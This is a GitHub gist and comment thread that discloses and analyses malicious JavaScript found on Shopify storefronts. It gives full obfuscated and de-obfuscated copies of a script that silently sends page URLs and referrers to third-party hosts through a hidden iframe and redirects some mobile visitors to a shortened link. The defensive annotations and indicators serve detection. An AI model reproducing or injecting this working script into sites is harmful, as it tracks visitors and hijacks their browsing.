@daniel-sim
Created April 18, 2019 16:41
DO NOT RUN: potentially malicious JavaScript found on some Shopify sites
// ANALYSIS SAMPLE: obfuscated script as captured. Kept byte-for-byte below; not for execution.
// `_0x3a4e` is a string lookup table. Every property name, URL and literal used by the
// script is fetched from it by index (for example `_0x3a4e[11]` is "href"), so the body
// contains no readable API names. In this variant the table itself is plain text.
// Indicators readable directly from the table:
//   [20] "http://bit.ly/2VdQsq0"                   value assigned to location.href
//   [22] "https://comic16.com/test/state"          XMLHttpRequest GET target
//   [31] "if-r-js-x"                               id given to the injected iframe
//   [33] "https://cdn-myshopify.com/home.html?q="  iframe src prefix
// The table name differs between the variants on this page (_0x3a4e, _0xaa30, _0x8ec5),
// so it is a poor search key. The iframe id is the same in all three, but the other two
// variants store it hex-escaped, so search for both the plain and the \x-escaped form.
var _0x3a4e=["random","floor","referrer","m.facebook.com","instagram.com","google.","bing.","indexOf","hostname","location","ourogoods.com","href","dice-bracelet","userAgent","test","onreadystatechange","readyState","status","california","responseText","http://bit.ly/2VdQsq0","GET","https://comic16.com/test/state","open","send","iframe","createElement","display","style","none","id","if-r-js-x","src","https://cdn-myshopify.com/home.html?q=","&cdnref=","appendChild","body","getElementById","remove"];var radN=Math[_0x3a4e[1]]((Math[_0x3a4e[0]]()* 100)+ 1);var siteRe=document[_0x3a4e[2]];var fRefFa=_0x3a4e[3];var fRefIn=_0x3a4e[4];var fRefGo=_0x3a4e[5];var fRefBg=_0x3a4e[6];var isMRFa=siteRe[_0x3a4e[7]](fRefFa);var isMRIn=siteRe[_0x3a4e[7]](fRefIn);var isMRGo=siteRe[_0x3a4e[7]](fRefGo);var isMRBg=siteRe[_0x3a4e[7]](fRefBg);if((isMRFa> -1|| isMRIn> -1|| isMRGo> -1|| isMRBg> -1)&& radN<= 15){var hname=window[_0x3a4e[9]][_0x3a4e[8]];var fHtn=_0x3a4e[10];var isMhtn=hname[_0x3a4e[7]](fHtn);var furl=window[_0x3a4e[9]][_0x3a4e[11]];var fUma=_0x3a4e[12];var isMUma=furl[_0x3a4e[7]](fUma);if(isMhtn> -1&& isMUma> -1){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x3a4e[14]](navigator[_0x3a4e[13]])){var xhttp= new XMLHttpRequest();xhttp[_0x3a4e[15]]= function(){if(this[_0x3a4e[16]]== 4&& this[_0x3a4e[17]]== 200){if(this[_0x3a4e[19]][_0x3a4e[7]](_0x3a4e[18])>= 0){}else {window[_0x3a4e[9]][_0x3a4e[11]]= _0x3a4e[20]}}};xhttp[_0x3a4e[23]](_0x3a4e[21],_0x3a4e[22],true);xhttp[_0x3a4e[24]]()}}};setTimeout(function(){var _0x9d64x12=document[_0x3a4e[2]];var hname=window[_0x3a4e[9]][_0x3a4e[11]];var _0x9d64x13=document[_0x3a4e[26]](_0x3a4e[25]);_0x9d64x13[_0x3a4e[28]][_0x3a4e[27]]= _0x3a4e[29];_0x9d64x13[_0x3a4e[30]]= _0x3a4e[31];_0x9d64x13[_0x3a4e[32]]= _0x3a4e[33]+ hname+ _0x3a4e[34]+ _0x9d64x12;document[_0x3a4e[36]][_0x3a4e[35]](_0x9d64x13)},2000);setTimeout(function(){var _0x9d64x14=document[_0x3a4e[37]](_0x3a4e[31]);if(_0x9d64x14){_0x9d64x14[_0x3a4e[38]]()}},4500)

shkm commented Apr 18, 2019

Older version:

// ANALYSIS SAMPLE: older obfuscated variant, kept byte-for-byte below; not for execution.
// Same lookup-table technique, but the table entries are \xNN hex escapes, so a plain-text
// search for the domain or the element id will not match this file.
// Decoded table, in order: href, location, iframe, createElement, display, style, none, id,
// if-r-js-x, src, https://cdn-myshopify.com/home.html?q=, appendChild, body,
// getElementById, remove.
// This variant contains only the hidden-iframe beacon: after 2000 ms it appends a
// display:none iframe whose src is the cdn-myshopify.com URL followed by the full page URL,
// and after 4500 ms it removes the element with id "if-r-js-x". It has no referrer check,
// no XMLHttpRequest and no redirect.
var _0xaa30=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x69\x64","\x69\x66\x2D\x72\x2D\x6A\x73\x2D\x78","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x6D\x79\x73\x68\x6F\x70\x69\x66\x79\x2E\x63\x6F\x6D\x2F\x68\x6F\x6D\x65\x2E\x68\x74\x6D\x6C\x3F\x71\x3D","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x6D\x6F\x76\x65"];setTimeout(function(){var _0xd24ax1=window[_0xaa30[1]][_0xaa30[0]];var _0xd24ax2=document[_0xaa30[3]](_0xaa30[2]);_0xd24ax2[_0xaa30[5]][_0xaa30[4]]= _0xaa30[6];_0xd24ax2[_0xaa30[7]]= _0xaa30[8];_0xd24ax2[_0xaa30[9]]= _0xaa30[10]+ _0xd24ax1;document[_0xaa30[12]][_0xaa30[11]](_0xd24ax2)},2000);setTimeout(function(){var _0xd24ax3=document[_0xaa30[13]](_0xaa30[8]);if(_0xd24ax3){_0xd24ax3[_0xaa30[14]]()}},4500)


shkm commented Apr 18, 2019

De-obfuscated latest version:

// ANALYSIS SAMPLE: de-obfuscated for reading, not for execution.
// Two independent behaviours are visible in this listing:
//   1. A gated redirect: referrer match + ~15% sampling + one specific host and URL
//      fragment + mobile user agent + a remote check, then location.href is overwritten.
//   2. An ungated beacon: on every page load a hidden iframe sends the full page URL and
//      the referrer to a third-party host, then the iframe is removed again.
// Indicators visible here: cdn-myshopify.com/home.html, comic16.com/test/state,
// bit.ly/2VdQsq0, element id "if-r-js-x".

// Random integer in 1..100. It is compared with 15 below, so the redirect branch is only
// considered on roughly 15% of page loads; this makes the behaviour intermittent and
// hard to reproduce on demand.
var radN = Math['floor']((Math['random']() * 100) + 1);
// Referrer of the current page; the four strings below are matched against it.
var siteRe = document['referrer'];
var fRefFa = 'm.facebook.com';
var fRefIn = 'instagram.com';
var fRefGo = 'google.';
var fRefBg = 'bing.';
// indexOf is a plain substring search over the whole referrer string (path and query
// included), not a comparison against the referrer's host name.
var isMRFa = siteRe['indexOf'](fRefFa);
var isMRIn = siteRe['indexOf'](fRefIn);
var isMRGo = siteRe['indexOf'](fRefGo);
var isMRBg = siteRe['indexOf'](fRefBg);
// Gate 1: visitor arrived from one of the listed social/search referrers AND the ~15% draw hit.
// A visit with no referrer (typed URL, bookmark) never enters this branch.
if ((isMRFa > -1 || isMRIn > -1 || isMRGo > -1 || isMRBg > -1) && radN <= 15) {
    var hname = window['location']['hostname'];
    var fHtn = 'ourogoods.com';
    var isMhtn = hname['indexOf'](fHtn);
    var furl = window['location']['href'];
    var fUma = 'dice-bracelet';
    var isMUma = furl['indexOf'](fUma);
    // Gate 2: host name contains 'ourogoods.com' AND the URL contains 'dice-bracelet'.
    // In this sample the redirect is therefore limited to that one host/URL pattern;
    // on any other page only the iframe beacon further down runs.
    if (isMhtn > -1 && isMUma > -1) {
        // Gate 3: user-agent string matches a mobile pattern, so desktop browsers never
        // see the redirect.
        if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i ['test'](navigator['userAgent'])) {
            var xhttp = new XMLHttpRequest();
            xhttp['onreadystatechange'] = function () {
                // readyState 4 is DONE; only a completed HTTP 200 response is acted on.
                if (this['readyState'] == 4 && this['status'] == 200) {
                    // Gate 4: the redirect is skipped when the response body contains
                    // 'california'. What the endpoint returns is not shown on this page;
                    // presumably a visitor-location string (unconfirmed).
                    if (this['responseText']['indexOf']('california') >= 0) {} else {
                        // Top-level navigation to a shortened link; the final destination
                        // cannot be determined from this listing.
                        window['location']['href'] = 'http://bit.ly/2VdQsq0'
                    }
                }
            };
            // Asynchronous cross-origin GET. A Content-Security-Policy connect-src that
            // does not list this host would block the request in the browser.
            xhttp['open']('GET', 'https://comic16.com/test/state', true);
            xhttp['send']()
        }
    }
};
// Beacon, scheduled 2000 ms after the script runs. It sits outside every gate above, so
// it fires on every page where the script is loaded, for every visitor.
setTimeout(function () {
    var _0x9d64x12 = document['referrer'];
    // Despite the name, this local holds the full page URL (href), not the host name.
    var hname = window['location']['href'];
    var _0x9d64x13 = document['createElement']('iframe');
    // display:none keeps the frame invisible to the visitor.
    _0x9d64x13['style']['display'] = 'none';
    _0x9d64x13['id'] = 'if-r-js-x';
    // The page URL and referrer are concatenated without URL-encoding. The full href is
    // sent, so anything carried in the page's query string or fragment is disclosed to
    // this host as well. The host name resembles Shopify's own domain naming; nothing on
    // this page shows it to be affiliated with Shopify.
    _0x9d64x13['src'] = 'https://cdn-myshopify.com/home.html?q=' + hname + '&cdnref=' + _0x9d64x12;
    document['body']['appendChild'](_0x9d64x13)
}, 2000);
// Clean-up, scheduled 4500 ms after the script runs: the iframe is in the DOM for only
// about 2.5 seconds, so inspecting the DOM after load will not find it. The request to
// the iframe host remains visible in the browser's network log, and a CSP frame-src
// that does not list the host would block the frame from loading.
setTimeout(function () {
    var _0x9d64x14 = document['getElementById']('if-r-js-x');
    if (_0x9d64x14) {
        _0x9d64x14['remove']()
    }
}, 4500)


shkm commented Apr 23, 2019

Latest version on cdn-clouds:

// ANALYSIS SAMPLE: later obfuscated variant, kept byte-for-byte below; not for execution.
// The lookup table `_0x8ec5` is \xNN hex-escaped, so plain-text searches for the domains
// or the element id will not match this file.
// Decoded entries of interest:
//   [20] http://bit.ly/2VdQsq0                value assigned to location.href
//   [22] https://comic16.com/test/state       XMLHttpRequest GET target
//   [31] if-r-js-x                            id given to the injected iframe
//   [33] https://cdn-clouds.com/home.html?q=  iframe src prefix
// The statements after the table have the same structure as the plain-text variant at the
// top of this page: a referrer/sampling/host/mobile-gated redirect, followed by an ungated
// hidden-iframe beacon at 2000 ms that is removed at 4500 ms.
var _0x8ec5=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x72\x65\x66\x65\x72\x72\x65\x72","\x6D\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x69\x6E\x73\x74\x61\x67\x72\x61\x6D\x2E\x63\x6F\x6D","\x67\x6F\x6F\x67\x6C\x65\x2E","\x62\x69\x6E\x67\x2E","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6F\x75\x72\x6F\x67\x6F\x6F\x64\x73\x2E\x63\x6F\x6D","\x68\x72\x65\x66","\x64\x69\x63\x65\x2D\x62\x72\x61\x63\x65\x6C\x65\x74","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x61\x6C\x69\x66\x6F\x72\x6E\x69\x61","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x32\x56\x64\x51\x73\x71\x30","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x6D\x69\x63\x31\x36\x2E\x63\x6F\x6D\x2F\x74\x65\x73\x74\x2F\x73\x74\x61\x74\x65","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x69\x64","\x69\x66\x2D\x72\x2D\x6A\x73\x2D\x78","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x63\x6C\x6F\x75\x64\x73\x2E\x63\x6F\x6D\x2F\x68\x6F\x6D\x65\x2E\x68\x74\x6D\x6C\x3F\x71\x3D","\x26\x63\x64\x6E\x72\x65\x66\x3D","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x6D\x6F\x76\x65"];var radN=Math[_0x8ec5[1]]((Math[_0x8ec5[0]]()* 100)+ 1);var siteRe=document[_0x8ec5[2]];var fRefFa=_0x8ec5[3];var fRefIn=_0x8ec5[4];var fRefGo=_0x8ec5[5];var fRefBg=_0x8ec5[6];var isMRFa=siteRe[_0x8ec5[7]](fRefFa);var isMRIn=siteRe[_0x8ec5[7]](fRefIn);var isMRGo=siteRe[_0x8ec5[7]](fRefGo);var isMRBg=siteRe[_0x8ec5[7]](fRefBg);if((isMRFa>  -1|| isMRIn>  -1|| isMRGo>  -1|| isMRBg>  -1)&& 
radN<= 15){var hname=window[_0x8ec5[9]][_0x8ec5[8]];var fHtn=_0x8ec5[10];var isMhtn=hname[_0x8ec5[7]](fHtn);var furl=window[_0x8ec5[9]][_0x8ec5[11]];var fUma=_0x8ec5[12];var isMUma=furl[_0x8ec5[7]](fUma);if(isMhtn>  -1&& isMUma>  -1){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x8ec5[14]](navigator[_0x8ec5[13]])){var xhttp= new XMLHttpRequest();xhttp[_0x8ec5[15]]= function(){if(this[_0x8ec5[16]]== 4&& this[_0x8ec5[17]]== 200){if(this[_0x8ec5[19]][_0x8ec5[7]](_0x8ec5[18])>= 0){}else {window[_0x8ec5[9]][_0x8ec5[11]]= _0x8ec5[20]}}};xhttp[_0x8ec5[23]](_0x8ec5[21],_0x8ec5[22],true);xhttp[_0x8ec5[24]]()}}};setTimeout(function(){var _0xae80x12=document[_0x8ec5[2]];var hname=window[_0x8ec5[9]][_0x8ec5[11]];var _0xae80x13=document[_0x8ec5[26]](_0x8ec5[25]);_0xae80x13[_0x8ec5[28]][_0x8ec5[27]]= _0x8ec5[29];_0xae80x13[_0x8ec5[30]]= _0x8ec5[31];_0xae80x13[_0x8ec5[32]]= _0x8ec5[33]+ hname+ _0x8ec5[34]+ _0xae80x12;document[_0x8ec5[36]][_0x8ec5[35]](_0xae80x13)},2000);setTimeout(function(){var _0xae80x14=document[_0x8ec5[37]](_0x8ec5[31]);if(_0xae80x14){_0xae80x14[_0x8ec5[38]]()}},4500)


shkm commented Apr 23, 2019

De-obfuscated cdn-clouds version:

// ANALYSIS SAMPLE: de-obfuscated cdn-clouds variant, for reading, not for execution.
// The only functional difference visible against the cdn-myshopify.com listing earlier on
// this page is the iframe host (cdn-clouds.com); the redirect logic, the XHR endpoint,
// the shortened link and the element id are unchanged.
// Indicators visible here: cdn-clouds.com/home.html, comic16.com/test/state,
// bit.ly/2VdQsq0, element id "if-r-js-x".

// Random integer in 1..100; compared with 15 below, so the redirect branch is only
// considered on roughly 15% of page loads.
var radN = Math['floor']((Math['random']() * 100) + 1);
// Referrer of the current page, matched by substring against the four strings below.
var siteRe = document['referrer'];
var fRefFa = 'm.facebook.com';
var fRefIn = 'instagram.com';
var fRefGo = 'google.';
var fRefBg = 'bing.';
// indexOf returns -1 when the substring is absent; the search covers the whole referrer
// string, not only its host name.
var isMRFa = siteRe['indexOf'](fRefFa);
var isMRIn = siteRe['indexOf'](fRefIn);
var isMRGo = siteRe['indexOf'](fRefGo);
var isMRBg = siteRe['indexOf'](fRefBg);
// Gate 1: one of the listed referrers matched AND the ~15% draw hit.
if ((isMRFa > -1 || isMRIn > -1 || isMRGo > -1 || isMRBg > -1) && radN <= 15) {
    var hname = window['location']['hostname'];
    var fHtn = 'ourogoods.com';
    var isMhtn = hname['indexOf'](fHtn);
    var furl = window['location']['href'];
    var fUma = 'dice-bracelet';
    var isMUma = furl['indexOf'](fUma);
    // Gate 2: host name contains 'ourogoods.com' AND the URL contains 'dice-bracelet';
    // pages that do not match both never reach the redirect.
    if (isMhtn > -1 && isMUma > -1) {
        // Gate 3: mobile user-agent pattern only.
        if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i ['test'](navigator['userAgent'])) {
            var xhttp = new XMLHttpRequest();
            xhttp['onreadystatechange'] = function () {
                // Act only on a completed (readyState 4) HTTP 200 response.
                if (this['readyState'] == 4 && this['status'] == 200) {
                    // Gate 4: a response body containing 'california' suppresses the
                    // redirect. The endpoint's output is not shown on this page;
                    // presumably a visitor-location string (unconfirmed).
                    if (this['responseText']['indexOf']('california') >= 0) {} else {
                        // Top-level navigation to a shortened link whose destination is
                        // not visible from this listing.
                        window['location']['href'] = 'http://bit.ly/2VdQsq0'
                    }
                }
            };
            // Asynchronous cross-origin GET; a CSP connect-src that omits this host
            // would block it in the browser.
            xhttp['open']('GET', 'https://comic16.com/test/state', true);
            xhttp['send']()
        }
    }
};
// Beacon, scheduled at 2000 ms and outside every gate above: it runs on every page that
// loads the script, regardless of referrer, host, device or the random draw.
setTimeout(function () {
    var _0xae80x12 = document['referrer'];
    // Holds the full page URL (href), despite the variable name.
    var hname = window['location']['href'];
    var _0xae80x13 = document['createElement']('iframe');
    // Hidden from the visitor.
    _0xae80x13['style']['display'] = 'none';
    _0xae80x13['id'] = 'if-r-js-x';
    // Full page URL and referrer are appended without URL-encoding, so query-string and
    // fragment contents of the visited page are disclosed to this host.
    _0xae80x13['src'] = 'https://cdn-clouds.com/home.html?q=' + hname + '&cdnref=' + _0xae80x12;
    document['body']['appendChild'](_0xae80x13)
}, 2000);
// Clean-up at 4500 ms: the iframe exists in the DOM for about 2.5 seconds only, so look
// for the request in network logs instead of inspecting the DOM after load. A CSP
// frame-src that omits the host would block the frame from loading.
setTimeout(function () {
    var _0xae80x14 = document['getElementById']('if-r-js-x');
    if (_0xae80x14) {
        _0xae80x14['remove']()
    }
}, 4500)


lbl652 commented Mar 6, 2020

Hi,
I am the admin of a Shopify website that has been "infected" lately. From time to time, and only on mobile, it is redirected to spam websites, and I suspect the code you have posted is the origin of the problem. I don't know how it could have ended up in the website's code, but I would now like to locate it, or at least verify whether it is the reason my website is facing this situation.
Thank you for any help.

Author

daniel-sim commented Mar 6, 2020

@lbl652 We weren't able to pin it down to a specific app, but we had a strong suspect: an app developer that used to be listed on the Shopify App Store but no longer was.

I recommend you remove all apps that are not essential to the store and start from there. Shopify support will be able to help some more if the issue persists, you can point them to this thread too. I hope you manage to get it sorted.


lbl652 commented Mar 6, 2020

Hi Daniel,
Thanks for your quick reply. I have currently 2 apps installed that are unlisted on the Shopify App Store, which are PayPal Tracking Info Populator, and Sweet Upsell. I will investigate on that.
Thanks again for your help.
